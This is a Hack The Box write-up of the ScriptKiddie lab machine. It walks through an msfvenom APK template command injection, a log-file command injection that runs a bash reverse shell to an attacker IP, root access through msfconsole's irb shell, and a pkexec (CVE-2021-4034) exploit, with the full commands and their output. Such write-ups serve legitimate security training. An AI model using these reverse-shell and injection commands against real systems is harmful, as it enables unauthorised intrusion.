🕵 HTB-Writeup : SCRIPTKIDDIE

2022-09-04 1203 words 6 minutes

/htb-writeup-scriptkiddie/featured-image.png

Contents

Recon

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


└─$ rustscan -a 10.10.10.226 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

Open 10.10.10.226:22
Open 10.10.10.226:5000

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    syn-ack Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods: 
|_  Supported Methods: GET POST HEAD OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We are face of a Werkzeug webserver. On the main page, we have access to 3 tools:

nmap
msfvenom
searchsploit

Vulnerability

The msfvenom tools here can generate Windows, Unix and Android payloads.

I first use searchsploit. I found some vulnerabilities on Werkzeug.

1
2
3
4
5
6
7
8


└─$ searchsploit Werkzeug                              
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
Pallets Werkzeug 0.15.4 - Path Trav | python/webapps/50101.py
Werkzeug - 'Debug Shell' Command Ex | multiple/remote/43905.py
Werkzeug - Debug Shell Command Exec | python/remote/37814.rb
------------------------------------ ---------------------------------

To be used, this exploit need an access to the console page of the Werkzeug server but we don’t have an access to it on that Box. Exploit can’t be used.

After some research, I found that the msfvenom tool is vulnerable to a APK template command injection

I found an article explaining that vulnerability.

The msfvenom Framework is vulnerable to command injection when the tools is used to craft an APK file using the -x switch. The option allow msfvenom to use an Android payload template to build the APK file.

We can use the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection to craft our Android payloads template.

1
2
3
4
5
6
7


msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit() > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit() > set lhost 10.10.16.11
msf6 exploit() > exploit

[+] msf.apk stored at /home/pezzz/.msf4/local/msf.apk

We can now try to generate an APK file using our template.

We get our first shell as kid. We can get the user flag!

1
2
3
4
5
6
7
8
9


└─$ rlwrap nc -lvnp 4444                
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.226] 47136

$ whoami
kid

$ cat /home/kid/user.txt
*************************ec7cb84

We can add our ssh key into authorized_keys to get a SSH access.

Path to the privesc

Local recon

I first run a LinPeas scan.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


kid@scriptkiddie:~$ ./linpeas.sh -qN > out

# checking sudo version
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560

# Checking last connection
╔══════════╣ Last time logon each user
Username         Port     From             Latest
kid < thats me   pts/0    10.10.16.11      Sat Sep  3 13:34:17 +0000 2022
pwn              pts/1    10.10.14.7       Thu Jan 28 17:52:15 +0000 2021

We found 2 potentials interesting informations.

First, the sudo version (v1.8.31) seems to be vulnerable at CVE-2021-4034 & CVE-2021-3560. Then, we see that the user pwn as been connected in the past from 10.10.14.7. The IP is accessible.

In /home/pwn directory we can see a script :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The script is reading the text contained in /home/kid/logs/hackers and pass the IP to a nmap command.

I confirmed that by trying to create a file with touch, it worked.

Since we have write access on /home/kid/logs/hackers we can inject arbitrary commands that will be executed with pwn rights.

Exploiting vulnerabilities

Exploiting pwn script

The text that we’re going to put in /home/kid/logs/hackers must respect three things :

a ; to start the line in order to separate our command from the previous one
a # to comment the rest of the line to avoid errors
two characters before our command because cut -d' ' -f3- will cut them

So our command will be the following :

1

a b ; bash -c '/bin/bash -i >& /dev/tcp/10.10.16.7/8888 0>&1' #

And we have now a shell as pwn :

1
2
3
4
5
6


connect to [10.10.16.7] from (UNKNOWN) [10.10.10.226] 54820
bash: cannot set terminal process group (866): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)

We can see that the user pwn can execute msfconsole as root without password :

1
2
3
4
5
6
7


sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

We can see in the help menu of msfconsole that we can obtain a ruby shell in the current context :

1
2
3
4
5
6
7


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context

In this shell we can call /bin/bash : https://gtfobins.github.io/gtfobins/irb/

Unfortunately we have to upgrade our shell :

1

stty: 'standard input': Inappropriate ioctl for device

I tried adding my ssh key but I don’t have the access. Fortunately, a simple python3 -c 'import pty; pty.spawn("/bin/bash")' solved the issue.

We can now exploit the vulnerability :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
[...]
msf6 > irb
irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> exec '/bin/bash'
root@scriptkiddie:/home/pwn/.ssh# id
id
uid=0(root) gid=0(root) groups=0(root)

We can now retrieve the root flag.

Exploiting CVEs

I tried to exploit both CVE found from LinPeas.

The first vulnerability (cve-2021-4034) is a local privilege escalation done with the polkit’s pkexec utility. pkexec “allows an authorized user to execute PROGRAM as another user”. According to the NSE description, “the current version of pkexec doesn’t handle the calling parameters count correctly and ends trying to execute environment variables as commands”.

A user can manipulate PATHs and send bad arguments to force pkexec to execute commands. If we send a null argument to pkexec, it is possible to execute commands that have been set on environnement PATHs. This article explain more specifically that vulnerability.

I found an exploit on github that reproduce those steps.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


# compiled exploit w/ gcc
kid@scriptkiddie:~$ gcc exploit.c -o exploit

# execute the exploit
kid@scriptkiddie:~$ ./exploit 
$ whoami
root

$ cat /root/root.txt
*************************fa68e5c

The exploit works! We got a root shell and we can get our flag ! :)